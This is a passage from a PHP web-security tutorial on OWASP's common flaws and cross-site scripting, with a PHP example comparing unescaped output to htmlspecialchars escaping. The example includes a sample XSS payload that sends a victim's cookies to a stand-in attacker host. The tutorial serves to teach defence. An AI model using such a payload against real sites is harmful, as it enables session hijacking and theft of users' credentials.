Given that online PHP applications are exposed to essentially anyone and everyone, security should be near, if not at, the top of your list of concerns as you develop your applications. To some extent, the ease with which PHP applications can be developed is also one of the language's greatest weaknesses: for beginners who aren't aware of the possible dangers, it's very easy to deploy an application whose line of security has as many holes as Swiss cheese.
Make sure you're informed and, if in any doubt, prepared to ask questions. The Open Web Application Security Project (OWASP) is a sponsored community focused on raising awareness of web security, and is an excellent source of information on potential dangers.
OWASP recently updated its list of the top ten most common security flaws in web applications, the relevant points of which I've summarized here. The previous version from 2004 still contains relevant information and, while there's some duplication, it's well worth a read.
For more detailed coverage of PHP security, you might like to read Essential PHP Security by Chris Shiflett, or php|architect's Guide to PHP Security by Ilia Alshanetsky.
This list comprises the most common flaws found in web applications today.

Cross-site scripting attacks are the result of sending user-supplied data to a browser without escaping it first. The problem with user-supplied data is that it's completely outside of your control: everything in the request comes from the client, and it's easy to fake values like the HTTP referrer and the values in a hidden form field.
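As an added example (this is not code from the book), here is the flaw just described beside its fix, followed by the same rule applied to the referrer and to a hidden form field. The page name greet.php, the parameter names, the attacker payload and the price list are all assumptions for illustration.

```php
<?php
// Added example, not code from the book. Assumes a page at /greet.php that
// reads $_GET['name'] and writes it back into the HTML it sends.

// Vulnerable: whatever the client sent is written into the page as-is, so a
// link such as /greet.php?name=<script>...</script> runs the attacker's
// script in every victim's browser, with that victim's cookies for this site.
function greet_vulnerable(string $name): string
{
    return "<p>Hello, $name!</p>";
}

// Hardened: escape on output. ENT_QUOTES also encodes single quotes, so the
// value is safe inside quoted attributes as well as in element text, and the
// explicit charset must match the encoding the page declares.
function greet_safe(string $name): string
{
    return '<p>Hello, ' . htmlspecialchars($name, ENT_QUOTES, 'UTF-8') . '!</p>';
}

// Constructed attacker input standing in for $_GET['name'].
$payload = '<script>new Image().src="http://attacker.example/?c="+document.cookie</script>';

echo greet_vulnerable($payload), PHP_EOL;
// The <script> element reaches the browser intact and executes.

echo greet_safe($payload), PHP_EOL;
// &lt;script&gt;... is displayed as text and never executes.

// The referrer is sent by the same untrusted client and can be set to
// anything, so it gets exactly the same treatment on output.
$referer = $_SERVER['HTTP_REFERER'] ?? '(none)';
echo '<p>Referred from: ', htmlspecialchars($referer, ENT_QUOTES, 'UTF-8'), '</p>', PHP_EOL;

// A hidden form field is just another request parameter. Use it only as a key
// into data you control on the server, never as the authoritative value: a
// hidden "price" field can be rewritten to 0.01 before the form is submitted.
$catalogue = ['42' => 19.99];                 // constructed server-side price list
$productId = $_POST['product_id'] ?? '';
$price     = $catalogue[$productId] ?? null;   // looked up here, not read from $_POST['price']
if ($price === null) {
    echo '<p>Unknown product.</p>', PHP_EOL;
} else {
    echo '<p>Price: ', htmlspecialchars((string) $price, ENT_QUOTES, 'UTF-8'), '</p>', PHP_EOL;
}
```

Run it from the command line (php greet.php) and compare the two greeting lines: the first contains a live script element, the second the same text with its angle brackets and quotes encoded. Escaping belongs at the point of output, because the same string may be safe in one context (a log file) and dangerous in another (an HTML page).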